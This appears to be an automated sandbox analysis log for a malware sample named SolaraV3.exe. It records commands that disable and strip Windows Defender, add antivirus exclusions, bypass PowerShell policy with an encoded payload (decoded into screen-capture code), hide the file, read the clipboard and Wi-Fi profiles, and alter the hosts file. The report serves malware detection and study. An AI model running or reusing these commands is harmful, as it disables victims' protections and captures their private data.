Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
